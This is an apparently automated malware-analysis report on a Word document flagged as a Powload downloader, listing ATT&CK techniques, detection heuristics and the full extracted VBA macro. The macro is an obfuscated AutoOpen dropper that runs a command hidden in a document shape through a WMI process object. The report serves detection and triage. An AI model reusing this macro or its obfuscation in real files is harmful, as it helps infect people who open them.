Verdict: MALICIOUS
Risk Score: 232

Malware Insights

MITRE ATT&CK:
- T1059.003 Windows Command Shell
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function that attempts to execute a highly obfuscated command. This command appears to construct and run a PowerShell command to download and execute a second-stage payload from a remote URL. The presence of the `cmd.exe` invocation and the obfuscated nature of the command strongly suggest a downloader or dropper functionality.
Heuristics (9)

- ClamAV: Doc.Malware.Powload-6813870-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6813870-0
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `End Select Set bfIKKuI = GetObject(sWzWXMSI + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + BpPHSnVYJ) On Error Resume Next`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6097 bytes |

SHA-256: 7847b43fba7dcf9cfb7c0fc55c9418156fc1959f77e921bc0c4d76dce6a93b57

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 102 of 163 identifiers look randomly generated (e.g. 'NLMPGANATmYQ'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "NLMPGANATmYQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case iKTOciszh
Case 45985471
FPbpt = 21874628
QBCjFSm = CLng(203469733)
Case 184538627
HdjuUVbj = Oct(qRbdFXPR)
NHUJa = LIqzFBc
Case 325598872
HsDaI = CDate(tzIFNLoX)
LpAfRUQzD = Int(71584852 * LfbbmNUY)
End Select
On Error Resume Next
Select Case EKXzcmTM
Case 83761720
aiPSolG = 151004253
aomzGXbS = CLng(249060251)
Case 270952365
urpBmBW = Oct(WSPYGW)
FwWbZimvu = RKRaATiXj
Case 237000209
sOfmPtAV = CDate(QjdPRd)
KPuIvuGUr = Int(33667943 * VwhAWmHM)
End Select
On Error Resume Next
Select Case nMmQopiS
Case 127838003
jzFjfkN = 118011559
jLwNJ = CLng(259691284)
Case 225166846
mAJONzd = Oct(UjjDZWQY)
HMrcZJc = EqYrwccF
Case 127063817
SJKVzczKE = CDate(OhNvYlB)
quNrhfJ = Int(45191263 * sVDGz)
End Select
Set zOSlMPc = Shapes("ukCIsbaRsAAdFc")
On Error Resume Next
Select Case zHOZJ
Case 191259502
tpFipF = 14731536
dVCSiXTk = CLng(168009887)
Case 107955366
RUkfLLl = Oct(liwhqAi)
JUYzXuS = TNutdjXp
Case 62684513
LzIJuTEa = CDate(DfoMSz)
JPAREWBEM = Int(332074737 * rBEKJX)
End Select
On Error Resume Next
Select Case hhwXm
Case 257919450
TrUZEbE = 316507397
fJtLmoGjo = CLng(303689462)
Case 134936929
PwhjYSi = Oct(kaXjqvjzZ)
HGqjvPPQ = tbSisS
Case 334864719
vnsfI = CDate(CIEmNVq)
JHFnO = Int(238468544 * ASRHzpRS)
End Select
VwzGAmpk = "" + OzaFuwd + iActd + osdoz + zOSlMPc.TextFrame.TextRange.Text + vCMZMsWQ + UkJpvWH
On Error Resume Next
Select Case nZHKsnk
Case 187485526
YSzqZi = 125863223
cJKFVKmj = CLng(278640972)
Case 135345463
kjdiaWk = Oct(GIzilS)
bwwWoYMFY = MXRPUdC
Case 126551216
rjuoZU = CDate(KMccbZma)
piTjwYaF = Int(20790940 * wSDmiz)
End Select
On Error Resume Next
Select Case NbWHjPb
Case 17938493
CrWMj = 196554140
ZfRmj = CLng(167685107)
Case 178717545
zlQGjvLh = Oct(mHtkSOPk)
ENKLz = CdzSrRqo
Case 5385905
KzwVTLrKo = CDate(YkUHQBB)
VNVlnfDG = Int(330714115 * pQwTstIRR)
End Select
Set bfIKKuI = GetObject(sWzWXMSI + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + BpPHSnVYJ)
On Error Resume Next
Select Case FpwAJtB
Case 214035387
FHUXoE = 246239110
Ornoj = CLng(327686778)
Case 122608792
QWKJPPnvX = Oct(KJXaNwRF)
QLbFDqf = KSoZsdK
Case 291525183
qWzpTZz = CDate(tciod)
XbYCipQGT = Int(240147753 * ddjJSfNi)
End Select
On Error Resume Next
Select Case TLzDi
Case 209993582
VqpjFpME = 235615500
jjupnc = CLng(206130063)
Case 146521999
oqnwfFuu = Oct(kbtjZCQmj)
zDBLM = AOBMfiTh
Case 314698920
thsKaLvPU = CDate(XAJrY)
wXWim = Int(202915500 * JiqshQB)
End Select
Const aqKdDc = 0
On Error Resume Next
Select Case BZitbM
Case 282266177
WumYDFnic = 338577405
MGcnDbm = CLng(272081948)
Case 7126579
jVNDpJmwo = Oct(titLiO)
RnqGFt = CEYmaS
Case 271032713
pwmZZUO = CDate(AinlfdNRI)
MUBKsdbA = Int(8653768 * kAVWYWtv)
End Select
On Error Resume Next
Select Case bIdqNBO
Case 11396923
TfbutJi = 312875351
GzvjvXX = CLng(179179205)
Case 9027108
VmHcdzzM = Oct(nYHIaD)
VIfkY = dHuwdvN
Case 40738771
mAifpM = CDate(zwtzP)
zwpUc = Int(279791305 * PwRLA)
End Select
On Error Resume Next
Select Case dtcXjQ
Case 26157511
NpPHQ = 175622204
jpLAvYn = CLng(168439811)
Case 101576679
loEKKlz = Oct(FqkiccB)
HXcdw = rqdiJKYv
Case 274879967
Nzwbzq = CDate(ERdLk)
wMiznRQzm = Int(187361467 * zNhjc)
End Select
bfIKKuI.Run@ VwzGAmpk, aqKdDc
On Error Resume Next
Select Case akulsl
Case 146773979
lbHSvY = 66888400
hjwrFB = CLng(187037285)
Case 15044243
uFwiFZWz = Oct(IilvTiw)
DWwURS = KfQjN
Case 53135399
IsBzfZc = CDate(CkUTPcim)
PvozGG = Int(105200013 * muYZInk)
End Select
On Error Resume Next
Select Case ZRRkhKk
Case 162864993
BilCVIi = 253217804
mnVpT = CLng(9177140)
Case 286817386
lcFoLCXv = Oct(oAMUGWZ)
XTAczv = wzXUzkzP
Case 292735914
YHThqjNGr = CDate(iafjQw)
whrJohZ = Int(280145282 * fCvtqk)
End Select
On Error Resume Next
Select Case RAHWHHA
Case 65253938
jQZOPzWXv = 339259433
GtTAQq = CLng(141708577)
Case 284187735
LMZpb = Oct(wZfdlr)
hQKNj = iMwwh
Case 299501595
XhGGQm = CDate(zfWqj)
wBzrRNTD = Int(78477970 * pDKUM)
End Select
End Sub